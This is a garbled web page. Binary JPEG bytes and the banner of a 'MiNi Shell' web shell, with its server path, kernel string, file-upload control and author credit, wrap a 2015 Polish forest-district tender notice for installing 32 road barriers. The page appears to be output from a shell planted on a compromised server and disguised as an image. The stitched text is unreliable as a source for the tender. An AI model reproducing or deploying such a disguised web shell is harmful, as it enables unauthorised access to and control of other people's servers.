JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150629/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150629/95953-N-2015.html

<p class="kh_header"><b>Ruszów: Dostawa i montaż rogatek na terenie będącym w zarządzie nadleśnictw: 
Pieńsk, Ruszów, Węgliniec</b><br>
<b>Numer ogłoszenia: 95953 - 2015; data zamieszczenia: 29.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ruszów , ul. Leśna 2, 59-950 Ruszów, woj. dolnośląskie, tel. 75 7714339, faks 75 7714468.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż rogatek na terenie będącym w zarządzie nadleśnictw: 
Pieńsk, Ruszów, Węgliniec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż 32 szt. rogatek w terenie, będącym w zarządzie nadleśnictw: Pieńsk, Ruszów, Węgliniec. Rogatka metalowa z rur stalowych o średnicy zewnętrznej 100 mm + /-/15% zabezpieczona farbą antykorozyjną i pomalowana emalią w pasy  w kolorach białym i zielonym. Rogatka z zamkiem, obrotowa 360° (słupek obrotowy, podpora, szlaban) przeznaczona do zamocowania w ziemi, grubość ścianki rury 3,2-3,6 mm, wymiary rogatki:
- długość- odległość między słupkami pionowymi (słupek obrotowy i podpora): 400 cm - 9 szt., 
   500 cm  -  12 szt., 600 cm - 10 szt., 700 cm - 1 szt.
- część nadziemna: 100 cm,
- część podziemna; 90-100 cm - słupek obrotowy i podpora, do części podziemnej przymocowane co
   najmniej 4 kotwy o długości 40 cm.
Na górze podpory zamek-urządzenie mechaniczne umożliwiające zablokowanie zamkniętego ramienia rogatki, ramię obrotowe wzmocnione wspornikiem z rur, dołączone 2 szt. kluczy.
Lokalizacja rogatek:
1. Nadleśnictwo Pieńsk (8 sztuk)
    - leśnictwo Piaseczna oddz. 29 i/57 f - 1 szt., 29 b/29 i - 1szt., 71 f/70 a - 1szt.; 
    - leśnictwo Bielawa oddz. 99 c - 1 szt.,  100 h - 1 szt., 122 n/122 g - 1 szt.;
    - leśnictwo Zielonka oddz. 209 c - 1 szt., 226 d/226 h - 1 szt. 
2. Nadleśnictwo Ruszów (15 sztuk)
    - leśnictwo Głuszec oddz. 450 m - 1szt.
    - leśnictwo Toporów oddz. 316 h - 1 szt., 587 h - 1 szt., 586 f - 1 szt., 583 g - 1 szt., 310 c - 1 szt.,
      534 f - 1 szt. 
    - leśnictwo Modrzew oddz. 165 c/166 c - 1 szt., 157 d/158 a - 1 szt., 166 f/166 i - 1 szt., 
      164 a/163 a - 1 szt., 357 a/358 a - 1 szt., 419 b/361 d - 1 szt.
    - leśnictwo Dzików  oddz. 521 a/470 c - 1 szt.
    - leśnictwo Dębówek oddz. 30 d - 1 szt.
3. Nadleśnictwo Węgliniec (9 sztuk)
    - leśnictwo Parowa oddz. 335 g - 1 szt., 310 c - 1 szt. 
    - leśnictwo Osiecznica oddz. 299 d - 1 szt., 276 a - 1 szt., 249 o - 1 szt., 249 d - 1 szt., 
      402 d - 1 szt.        
    - leśnictwo Zebrzydowa oddz. 555 n - 1 szt.
    - leśnictwo Czerna oddz. 576 c - 1 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.81.10-2, 45.22.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 500,00 złotych.
2. Wadium musi zostać wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
        dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
        z 2007 r. Nr 42 poz. 275 ze zmianami).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego: PKO BP S.A. Bolesławiec  Nr  51 1020 2137 0000 9202 0101 5841  
    z dopiskiem: Wadium - N.270.10.2015.KRPL - Dostawa i montaż rogatek.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy
    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej oraz w formie
    poręczenia udzielonego przez podmioty, o których mowa w pkt. 3.5, należy złożyć w formie 
    oryginału w siedzibie Zamawiającego (sekretariat - pokój nr 20), a kopię załączyć do oferty.
7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta
    została wybrana jako najkorzystniejsza.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
    zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę
    przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono
    wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
    najkorzystniejsza. Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym
    przez  Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi
    z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty
    prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek 
    bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
     wybrana:
     1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
        w ofercie;
     2) nie wniósł wymaganego zabezpieczenia należytego wykonania przedmiotu umowy;
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
         po stronie Wykonawcy.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, który w określonym
    terminie nie złożył wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których
    mowa w pkt. XI SIWZ lub pełnomocnictw, i w odpowiedzi na wezwanie Zamawiającego nie
    złoży ich w wyznaczonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących
    po jego stronie.
14. W przypadku wniesienia wadium w walucie innej niż PLN, przeliczenie wartości wadium  
    na PLN nastąpi  wg średniego kursu NBP z dnia publikacji ogłoszenia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany do dysponowania wiedzą i doświadczeniem umożliwiającym prawidłowe wykonanie przedmiotu zamówienia. W celu potwierdzenia dysponowania wiedzą i doświadczeniem umożliwiającym prawidłowe wykonanie przedmiotu zamówienia Wykonawca jest zobowiązany do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany do dysponowania potencjałem technicznym umożliwiającym prawidłowe wykonanie przedmiotu zamówienia. W celu potwierdzenia dysponowania potencjałem technicznym umożliwiającym prawidłowe wykonanie przedmiotu zamówienia Wykonawca jest zobowiązany do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany do dysponowania osobami zdolnymi do prawidłowego wykonania przedmiotu zamówienia. W celu potwierdzenia dysponowania osobami zdolnymi do prawidłowego wykonania przedmiotu zamówienia Wykonawca jest zobowiązany do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany do znajdowania się w sytuacji ekonomicznej i finansowej umożliwiającej prawidłowe wykonanie przedmiotu zamówienia. W celu potwierdzenia znajdowania się w sytuacji umożliwiającej prawidłowe wykonanie przedmiotu zamówienia Wykonawca jest zobowiązany do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z Załącznikiem do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron w formie aneksu 
    do umowy, pod rygorem nieważności takiej zmiany. 
2. Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, 
    na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
    1) w przypadku zaistnienia konieczności wprowadzenia zmian w sposobie lub technologii
         wykonania przedmiotu umowy;
    2) przyczyn, leżących po stronie Zamawiającego;
    3) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni 
        wpływ na terminowość wykonywania robót;
    4) wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo 
        zachowania należytej staranności;
     5) warunków atmosferycznych uniemożliwiających wykonanie przedmiotu zamówienia 
          w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość 
          przedmiotu zamówienia. 
3. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego i podpisanego przez
    przedstawicieli Zamawiającego oraz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_wroclaw/nadl_ruszow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2015 godzina 12:00, miejsce: Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów
Sekretariat - pokój Nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone w ramach projektu LIFE11 NAT/PL/428 Czynna ochrona nizinnych populacji głuszca (Tetrao urogallus L.) na terenie Borów Dolnośląskich i Puszczy Augustowskiej (Active protection of lowlandpopulations of Capercaillie in the Bory Dolnośląskie Forest and Augustowska PrimevalForest) - oznaczonego dla potrzeb Instrumentu Finansowego dla Środowiska LIFE+ nr LIFE 11NAT/PL/428oraz wykorzystania i rozliczenia dotacji ze środków Wspólnoty Europejskiej, udzielonej na podstawie stosownej umowy o nr LIFE 11NAT/PL/428 oraz ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej, udzielonej na podstawie umowy o nr 716/2012/Wn50/OP-RE-LF/D oraz ze środków Państwowego Gospodarstwa Leśnego Lasy Państwowe (część działania C.20 - Ograniczenie antropopresji na terenie Borów Dolnośląskich)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com